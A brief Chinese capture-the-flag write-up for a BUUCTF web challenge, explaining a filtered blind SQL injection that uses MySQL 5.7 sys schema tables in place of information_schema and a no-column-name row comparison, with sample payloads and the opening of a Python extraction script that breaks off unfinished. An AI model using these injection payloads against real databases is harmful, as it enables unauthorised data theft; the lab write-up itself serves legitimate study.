朴实无华一张图片,一个输入框,图片太大就不放了
1是Nu1L,2是V&N,剩下都是“Error Occured When Fetch Result.”
fuzz一下,507的都是被过滤了的
过滤了关键的information,
要用到无列名注入,找库名时需要用到用到5.7版本新增的sys库
利用sys库里的三个表都行
schema_table_statistics/schema_table_statistics_with_buffer
/x$schema_flattened_keys
表可以代替information.schema找到表名
找到表名后用按位比较跑
2||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))
麻了,试了一晚上异或没搞出来,然后就用或了,getflag的二分脚本也先放着,后面补
sleep(5)防止buu爆429乱跑
import requests
import requests
import time
url = 'http://6ab28464-7325-4ec9-b2a9-4ed67560619b.node4.buuoj.cn:81/'
def findtable():
payload = '2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics where table_schema=database()),{},1))>{}'
flag